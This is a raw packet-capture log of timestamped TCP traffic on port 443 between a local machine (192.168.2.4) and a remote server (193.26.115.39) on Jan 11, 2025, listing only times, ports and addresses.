                                                                                      Jan 11, 2025 22:53:07.409363985 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.409408092 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.409430027 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.409442902 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.409470081 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.409487009 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.409574032 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.409621000 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.409655094 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.409667015 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.409693956 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.409710884 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.409797907 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.409841061 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.409867048 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.409878969 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.409904003 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.409923077 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.452110052 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.452153921 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.452215910 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.452235937 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.452263117 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.452280045 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.462393045 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.462440014 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.462492943 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.462510109 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.462538004 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.462554932 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.494107962 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.494160891 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.494200945 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.494246960 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.494277954 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.494296074 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.494524956 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.494575977 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.494613886 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.494626999 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.494657040 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.494683027 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.494812965 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.494869947 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.494904995 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.494916916 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.494942904 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.494962931 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.495124102 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.495167017 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.495198965 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.495210886 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.495240927 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.495261908 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.495480061 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.495524883 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.495560884 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.495573044 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.495599031 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.495620012 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.495785952 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.495831013 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.495881081 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.495898008 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.495925903 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.495945930 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.538927078 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.538969040 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.539005995 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.539020061 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.539052010 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.539068937 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.549079895 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.549120903 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.549169064 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.549182892 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.549211025 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.549232006 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.581536055 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.581578970 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.581623077 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.581638098 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.581681967 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.581722021 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.582277060 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.582319021 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.582348108 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.582365990 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.582391024 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.582407951 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.582889080 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.582930088 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.582973003 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.582984924 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.583012104 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.583031893 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.583102942 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.583144903 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.583172083 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.583183050 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.583228111 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.583250999 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.583376884 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.583417892 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.583453894 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.583467007 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.583494902 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.583512068 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.583636999 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.583677053 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.583698988 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.583712101 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.583741903 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.583766937 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.625895977 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.625963926 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.625997066 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.626030922 CET44349737193.26.115.39192.168.2.4
                                                                                      Jan 11, 2025 22:53:07.626060963 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.626077890 CET49737443192.168.2.4193.26.115.39
                                                                                      Jan 11, 2025 22:53:07.635982990 CET44349737193.26.115.39192.168.2.4
Jan 11, 2025 22:53:07.636053085 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.636085987 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.636100054 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.636125088 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.636154890 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.668647051 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.668700933 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.668768883 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.668790102 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.668814898 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.668843985 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.669326067 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.669392109 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.669430017 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.669447899 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.669476986 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.669715881 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.669867992 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.669912100 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.669939041 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.669951916 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.669981003 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.670001984 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.670099974 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.670145035 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.670171976 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.670183897 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.670218945 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.670236111 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.670325041 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.670372963 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.670393944 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.670406103 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.670435905 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.670455933 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.670538902 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.670661926 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.670685053 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.670696974 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.670727015 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.670747042 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.712533951 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.712605953 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.712609053 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.712641954 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.712665081 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.712687016 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.722707987 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.722729921 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.722784996 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.722803116 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.722837925 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.722857952 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.754935980 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.754981995 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.755017996 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.755033016 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.755059958 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.755079985 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.755270958 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.755331039 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.755347967 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.755362034 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.755393982 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.755425930 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.755552053 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.755594015 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.755642891 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.755655050 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.755681992 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.755701065 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.755811930 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.755852938 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.755876064 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.755888939 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.755916119 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.755935907 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.756148100 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.756187916 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.756206036 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.756227970 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.756242990 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.756299019 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.756299019 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.756584883 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.756624937 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.756674051 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.756685972 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.756716013 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.756742001 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.806051016 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.806111097 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.806153059 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.806171894 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.806221962 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.806269884 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.809485912 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.809534073 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.809566021 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.809580088 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.809609890 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.809628963 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.844010115 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.844058990 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.844118118 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.844132900 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.844161034 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.844177961 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.844320059 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.844362020 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.844397068 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.844408989 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.844434023 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.844454050 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.844784021 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.844825029 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.844858885 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.844871044 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.844897032 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.844913960 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.845144033 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.845187902 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.845216036 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.845227957 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.845257044 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.845277071 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.845455885 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.845496893 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.845524073 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.845535994 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.845566034 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.845594883 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.845654011 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.845694065 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.845721006 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.845733881 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.845786095 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.845786095 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.892874002 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.892896891 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.892939091 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.892960072 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.892985106 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.893017054 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.896306038 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.896334887 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.896378040 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.896399021 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.896431923 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.896452904 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.932204962 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.932301044 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.932351112 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.932364941 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.932394981 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.932419062 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.933044910 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.933092117 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.933136940 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.933149099 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.933176994 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.933202982 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.933650970 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.933712959 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.933729887 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.933743000 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.933790922 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.933810949 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.934191942 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.934233904 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.934264898 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.934277058 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.934304953 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.934324980 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.934751034 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.934791088 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.934823036 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.934834003 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.934861898 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.934879065 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.934930086 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.935014009 CET | 49737 | 443 | 192.168.2.4 | 193.26.115.39
Jan 11, 2025 22:53:07.935024977 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
Jan 11, 2025 22:53:07.935055017 CET | 443 | 49737 | 193.26.115.39 | 192.168.2.4
